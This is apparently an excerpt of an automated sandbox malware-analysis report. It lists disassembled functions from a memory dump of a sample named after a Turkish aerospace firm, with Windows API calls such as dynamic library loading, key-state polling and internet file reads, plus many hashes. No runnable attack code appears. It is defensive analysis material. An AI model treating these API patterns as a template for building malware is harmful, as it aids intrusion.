Instruction Fuzzy Hash: 80515E35A006199FCB04EF64D880AADBBF5FF59314F188058E949AB362CB31ED41CFA0

Function 00208EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00208F40
GetProcAddress.KERNEL32(00000000,?), ref: 00208FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 00208FEC
GetProcAddress.KERNEL32(00000000,?), ref: 00209032
FreeLibrary.KERNEL32(00000000), ref: 00209052

Part of subcall function 0019F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,001F1043,?,7735E610), ref: 0019F6E6
Part of subcall function 0019F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,001DFA64,00000000,00000000,?,?,001F1043,?,7735E610,?,001DFA64), ref: 0019F70D

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 290d84e1d7c3196317ace2111d51dbc3dbedb99121ed1945e8fc3549c7fa86ac
Instruction ID: 00a44e6ccdfd5921e99297ee71fa7a76bb597e7fe7f654b600498b17af73a530
Opcode Fuzzy Hash: 290d84e1d7c3196317ace2111d51dbc3dbedb99121ed1945e8fc3549c7fa86ac
Instruction Fuzzy Hash: 5B514E35604206DFC715EF64C4848ADBBF1FF59314B588098E84A9B7A2DB31EE85CF90

Function 00216B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00216C33
SetWindowLongW.USER32(?,000000EC,?), ref: 00216C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00216C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,001FAB79,00000000,00000000), ref: 00216C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00216CC7

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: 8b2b6b261731df661e2a022e1909f01ca71545e9649f1b0eee6cc8846edacc7b
Instruction ID: 7d2b3e4d83db230d37a340d4ed7de2c5c17921b8040db12360c6bd71db124baa
Opcode Fuzzy Hash: 8b2b6b261731df661e2a022e1909f01ca71545e9649f1b0eee6cc8846edacc7b
Instruction Fuzzy Hash: 7441B339624105AFD724CF28CC5CFED7BE5EB29350F154269F895A72E0C771ADA1CA80

Function 001B2051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 001B20C3
_free.LIBCMT ref: 001B20E3

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 3876d7330f3e215f604b49301e6f30195be9e20f1816aff02552fd5f658582c9
Instruction ID: 3ef9b7659c2fddc60aa6b847e9450c7087237ad84d0b3087a9c494ec5be2eeeb
Opcode Fuzzy Hash: 3876d7330f3e215f604b49301e6f30195be9e20f1816aff02552fd5f658582c9
Instruction Fuzzy Hash: DA41E476A00200AFCB24DF78C881A9DB7F5EF89314F254568F515EB355DB31AD05CB80

Function 0019912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00199141
ScreenToClient.USER32(00000000,?), ref: 0019915E
GetAsyncKeyState.USER32(00000001), ref: 00199183
GetAsyncKeyState.USER32(00000002), ref: 0019919D

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 4b7b4cfb7e2178ad698be85c98ca3298394e3633b46e59245841c724fc85ce03
Instruction ID: e36fe49dc52d91c56c770a648f914be9e0dc217e8ecb5dafde36754aeb5f7458
Opcode Fuzzy Hash: 4b7b4cfb7e2178ad698be85c98ca3298394e3633b46e59245841c724fc85ce03
Instruction Fuzzy Hash: DA414F71A0851AFBDF199F68C848BEEB775FB15330F21832AE425A62D0D7306954CB91

Function 001F3874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 001F38CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 001F3922
TranslateMessage.USER32(?), ref: 001F394B
DispatchMessageW.USER32(?), ref: 001F3955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001F3966

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 42268c851a1f1c6f021bf04c8782a1e7ad7530f041dde4951bbbbcb02eccb443
Instruction ID: 27b40c538e52acbe0e1d38436c6f4dc363bfbca94cb3dbd9312783b33ba166bf
Opcode Fuzzy Hash: 42268c851a1f1c6f021bf04c8782a1e7ad7530f041dde4951bbbbcb02eccb443
Instruction Fuzzy Hash: 8B31D77094434AAEEB39CB34E85CBB637E8BB15349F14056DE672821E0E7F49A85CB11

Function 001FCF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,001FC21E,00000000), ref: 001FCF38
InternetReadFile.WININET(?,00000000,?,?), ref: 001FCF6F
GetLastError.KERNEL32(?,00000000,?,?,?,001FC21E,00000000), ref: 001FCFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,001FC21E,00000000), ref: 001FCFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,001FC21E,00000000), ref: 001FCFF2

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 3b11e86ac979997e803dc3cb563cc6936858cb3205fa05aa1341e99f45ca714b
Instruction ID: 283376caaa185548d75f6564a2ea7f54a1b90081c15873bdb962bd64cf03374c
Opcode Fuzzy Hash: 3b11e86ac979997e803dc3cb563cc6936858cb3205fa05aa1341e99f45ca714b
Instruction Fuzzy Hash: E6314F7190420DAFDB24DFA5D984ABBFBF9EB14350B10842EF616D2140DB30AE41EBA0

Function 001E1901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 001E1915
PostMessageW.USER32(00000001,00000201,00000001), ref: 001E19C1
Sleep.KERNEL32(00000000,?,?,?), ref: 001E19C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 001E19DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 001E19E2

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: de3afb56e8d3ded7b4a2ec7a47610ea5b85a428f17246a8064f0444fe9013043
Instruction ID: f82175239c725627edca002ba7e17f305dfd595e0f34a2d2b041d7b581399d25
Opcode Fuzzy Hash: de3afb56e8d3ded7b4a2ec7a47610ea5b85a428f17246a8064f0444fe9013043
Instruction Fuzzy Hash: B331D171900259FFCB04CFA8DD98ADE3BB5EB54318F108225F921A72D1C7709944CB90

Function 00215706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00215745
SendMessageW.USER32(?,00001074,?,00000001), ref: 0021579D
_wcslen.LIBCMT ref: 002157AF
_wcslen.LIBCMT ref: 002157BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 00215816

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: e7995e2430d70f53c9de5b0f0d207f7b339cd340b067fdaa3bf070ca36a73229
Instruction ID: 1a55759543808ec3e533088613b05813ffea6c7556068fa3f376a269f0533e50
Opcode Fuzzy Hash: e7995e2430d70f53c9de5b0f0d207f7b339cd340b067fdaa3bf070ca36a73229
Instruction Fuzzy Hash: A221B134920628DADB209F60CC85AEEB7B8FFA4324F108256E919AA1C0D77089E5CF50

Function 00200930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00200951
GetForegroundWindow.USER32 ref: 00200968
GetDC.USER32(00000000), ref: 002009A4
GetPixel.GDI32(00000000,?,00000003), ref: 002009B0
ReleaseDC.USER32(00000000,00000003), ref: 002009E8

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: cf4ebae789cb8de7251728d22b25df11f26e97b67f75aaaee11bc5c26bd2b064
Instruction ID: 056249b5a332878e7a0a13ce46767204fb4a8ac4d703d73f5a279b2abf5606aa
Opcode Fuzzy Hash: cf4ebae789cb8de7251728d22b25df11f26e97b67f75aaaee11bc5c26bd2b064
Instruction Fuzzy Hash: 12218179600204AFD704EF65D888AAEBBE9EF54700F148068E94AD7362CB70AD04CB50

Function 001BCDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 001BCDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001BCDE9

Part of subcall function 001B3820: RtlAllocateHeap.NTDLL(00000000,?,00251444,?,0019FDF5,?,?,0018A976,00000010,00251440,001813FC,?,001813C6,?,00181129), ref: 001B3852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 001BCE0F
_free.LIBCMT ref: 001BCE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001BCE31

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: c8c0ecda425dc2d7f0400cb6ad59c31506bc8a00f2721a3e957ebd00bc6e77a4
Instruction ID: 57e67a4a2cda897a2fcfc22d4c737347c37a04084fecfe91e3398e399100bb6e
Opcode Fuzzy Hash: c8c0ecda425dc2d7f0400cb6ad59c31506bc8a00f2721a3e957ebd00bc6e77a4
Instruction Fuzzy Hash: 20018476601215BF23211AB66C8CDFB6E6DDED6BA13254129F905DB201EF61CD0181F0

Function 00199639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00199693
SelectObject.GDI32(?,00000000), ref: 001996A2
BeginPath.GDI32(?), ref: 001996B9
SelectObject.GDI32(?,00000000), ref: 001996E2

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 0af6c1c22de6fd57924770c14924e703b4b48e562ee15686825ee82f5183db54
Instruction ID: db3b105bdb4f76fe1dead13735e925ad8df2ac6c615c0418db7c71c695ef6be8
Opcode Fuzzy Hash: 0af6c1c22de6fd57924770c14924e703b4b48e562ee15686825ee82f5183db54
Instruction Fuzzy Hash: CD215E70802345EBDF119F68FC1C7E93BA9BB51366F20461AF415A61B0D77098A5CF98

Function 001E5711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 001E5726
_memcmp.LIBVCRUNTIME ref: 001E5744
_memcmp.LIBVCRUNTIME ref: 001E5757
_memcmp.LIBVCRUNTIME ref: 001E576F
_memcmp.LIBVCRUNTIME ref: 001E5787

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: c5370346f9b5800946cb2bbc55e009a8551e77fb071efd99e4fcffccb0bace9d
Instruction ID: a9aec0f2c4c5dafe1a36332c70cbb2905a666de4993a72200cabb265d960c595
Opcode Fuzzy Hash: c5370346f9b5800946cb2bbc55e009a8551e77fb071efd99e4fcffccb0bace9d
Instruction Fuzzy Hash: F4019665A45E45FA970899129E52FFF739EAF323ACF844021FD149A241F760ED7082E0

Function 001B2DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,001AF2DE,001B3863,00251444,?,0019FDF5,?,?,0018A976,00000010,00251440,001813FC,?,001813C6), ref: 001B2DFD
_free.LIBCMT ref: 001B2E32
_free.LIBCMT ref: 001B2E59
SetLastError.KERNEL32(00000000,00181129), ref: 001B2E66
SetLastError.KERNEL32(00000000,00181129), ref: 001B2E6F

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 940d7b6e0fa95ec6cd57b57fa52b0043562b4435797a0827d7fab1bfa8f78522
Instruction ID: bd9a138846716deb0e89bc47b79698cfdf32f9b7a37bdef36a2e60cd2c5d8278
Opcode Fuzzy Hash: 940d7b6e0fa95ec6cd57b57fa52b0043562b4435797a0827d7fab1bfa8f78522
Instruction Fuzzy Hash: 1801CD3614561077C61367767C89DEB155DABE57757354428F839A32D2EF74CC0D4120

Function 001E000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,001DFF41,80070057,?,?,?,001E035E), ref: 001E002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001DFF41,80070057,?,?), ref: 001E0046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001DFF41,80070057,?,?), ref: 001E0054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001DFF41,80070057,?), ref: 001E0064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001DFF41,80070057,?,?), ref: 001E0070

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 7d28a2097ba79eaa68c2af1462e026e855966cf10ae01b971d1a77e951901f9e
Instruction ID: 19d930eba8fd8a3a89e6b5be8dd2e239574d3aa2e8fbe41b84febdf3d47bd202
Opcode Fuzzy Hash: 7d28a2097ba79eaa68c2af1462e026e855966cf10ae01b971d1a77e951901f9e
Instruction Fuzzy Hash: 3E01A776640604BFDB125F6AEC48BEE7AEDEF48791F258114F905D2210DBB1DD808760

Function 001EE97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 001EE997
QueryPerformanceFrequency.KERNEL32(?), ref: 001EE9A5
Sleep.KERNEL32(00000000), ref: 001EE9AD
QueryPerformanceCounter.KERNEL32(?), ref: 001EE9B7
Sleep.KERNEL32 ref: 001EE9F3

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 840827f713f0740f2c7d05f26b54fd9719b2cb9909d5a48a4ef0f68482a85ac0
Instruction ID: 9bad4be2a676bd61bfbcca13b1e4178c1b0cbdae847ecff7cd72730e9d96f60c
Opcode Fuzzy Hash: 840827f713f0740f2c7d05f26b54fd9719b2cb9909d5a48a4ef0f68482a85ac0
Instruction Fuzzy Hash: 3E015B35C41A29EBCF009FE6E85DAEDBBB8BB18704F114556E902B2242CB309590C7A1

Function 001E10F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001E1114
GetLastError.KERNEL32(?,00000000,00000000,?,?,001E0B9B,?,?,?), ref: 001E1120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,001E0B9B,?,?,?), ref: 001E112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,001E0B9B,?,?,?), ref: 001E1136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 001E114D

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: b7ff3c631f3f5a696f5f030f3a3d84082a50214489bd0e6340da4fd6fedd071c
Instruction ID: 8e766090c2cca05b82c100446dbeedc85c51b01408d16278f0a807c5b0f4cb20
Opcode Fuzzy Hash: b7ff3c631f3f5a696f5f030f3a3d84082a50214489bd0e6340da4fd6fedd071c
Instruction Fuzzy Hash: EE011D79140705BFDB114F65EC4DAAA3B6EEF85360B244425FA45D7350DF71DC109A60

Function 001E0FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 001E0FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 001E0FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 001E0FE5
